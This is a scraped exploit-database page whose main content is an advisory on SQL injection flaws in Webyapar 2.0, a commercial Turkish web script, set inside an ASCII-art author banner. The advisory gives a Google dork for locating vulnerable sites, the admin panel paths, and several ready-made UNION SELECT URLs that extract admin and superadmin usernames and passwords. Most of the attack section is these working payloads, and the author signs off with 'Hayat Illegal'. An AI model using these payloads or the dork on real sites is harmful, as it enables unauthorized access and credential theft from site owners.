0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Webyapar 2.0 Multiple Remote SQL Injection Vulnerabilities
========================================================== Webyapar 2.0 Multiple Remote SQL Injection Vulnerabilities ========================================================== ######################################################################################################################### ######################################################################################################################### ############/$$$$$$$$$$$////$$$$$$$$$$$//###################///////////###############//$$$$$$$$$$$$$$$//$$$$$$$$$$$$$$$/ ###///////##/$$$$$$$$//////////$$$$$$$$//####################/////////#####//////$$$$$//$$$$/////////////$$$$//////////// ##///////###/$$$$$$$////////////$$$$$$$//#####///////////#####///////#####///////$$$$$//$$$$/////////////$$$$//////////// ##//////###///$$$$$$$//////////$$$$$$$///#####///////////#####//////#####////////$$$$$//$$$$/////////////$$$$//////////// ##/////###/////$$$$$$$////////$$$$$$$////#####//////////######/////#####/////////$$$$$//$$$$/////////////$$$$//////////// ##////###///////$$$$$$$//////$$$$$$$/////######////////#######////#####//////////$$$$$//$$$$/////////////$$$$//////////// ##///###/////////$$$$$$$////$$$$$$$//////#######//////#######////#####///////////$$$$$//$$$$/////////////$$$$//////////// ###################$$$$$$##$$$$$$################################################$$$$$##$$$$$$$$$$$$$$$##$$$$$$$$$$$$$$$$ ####################$$$$$$$$$$$$#################################################$$$$$##$$$$$$$$$$$$$$$##$$$$$$$$$$$$$$$$ ##///###////////////$$$$$$$$$$$$/////////#########////////////#####//////////////$$$$$//$$$$$$$$$$$$$$$//$$$$$$$$$$$$$$$$ ##////###////////////$$$$$$$$$$//////////########////////////#####///////////////$$$$$/////////////$$$$//////////////$$$$ ##/////###////////////$$$$$$$$///////////#######////////////#####////////////////$$$$$/////////////$$$$//////////////$$$$ ##//////###////////////$$$$$$////////////#######///////////#####/////////////////$$$$$/////////////$$$$//////////////$$$$ ###//////##/////////////$$$$/////////////#######//////////#####//////////////////$$$$$/////////////$$$$//////////////$$$$ ############/////////////$$//////////////#######/////////#####///////////////////$$$$$//$$$$$$$$$$$$$$$//$$$$$$$$$$$$$$$$ ######################################################################################################################### ######################################################################################################################### ##### TURKISH SECURITY MAN AND C0D3R ####################### MAIL : dumanhack@gmail.com ########################### ##### - ##### web : ########## ##### PERFECT C0D3R AND SECURITY ## >>>>>>>>>>>>>> MESSAGE : HAYAT ILLEGAL <<<<<<<<<<<<<<< ## ######################################################################################################################### # Title : webyapar v2.0 Remote Blind SQL Injection Vulnerability # AUTHOR: : bypass # script name : Webyapar v2.0 { 700$ } # Language : Tr # scritp web page : www.webyapar.com # script bug : remote sql enjeksiyon # script admin panel1 : http://victim/script_path/yonetim # script admin panel2 : http://victim/script_path/yonetim2 # google dork : inurl:"?page=duyurular_detay&id=" #Message Tr : ingilizcem pek iyi degildir. kodun piyasada sat?s degeri 700$ - kodun sql d?s?nda xss ac?klar?da bulunmaktad?r ama pek fazla xss ac?klar? isinize yaramayacakt?r. yonetim panelleri standart verilmistir... # Message Tr : Hayat Illegal - / - < / -------------------------------------------------------------------------------------------------------- /> < / ------ Example sql bug 1 admin username : ------ / > http://VICTIM/SCRIPT_PATH/?page=download&kat_id=-116+union+all+select+0,kullanici+from+admin < / ------ Example sql bug 1 admin password : ------ / > http://VICTIM/SCRIPT_PATH/?page=download&kat_id=-116+union+all+select+0,sifre+from+admin < / ------ Example sql bug 2 superadmin password and admin username : ------ / > http://VICTIM/SCRIPT_PATH/?page=duyurular_detay&id=-50+union+all+select+0,kullanici,2,3,sifre,5+from+superadmin < / -------------------------------------------------------------------------------------------------------- /> Sql enjeksiyon bug 1 : /?page=download&kat_id=-116+union+all+select+0,sifre+from+admin Sql enjeksiyon bug 2 : /?page=duyurular_detay&id=-50+union+all+select+0,kullanici,2,3,sifre,5+from+admin # 0day.today [2024-12-24] #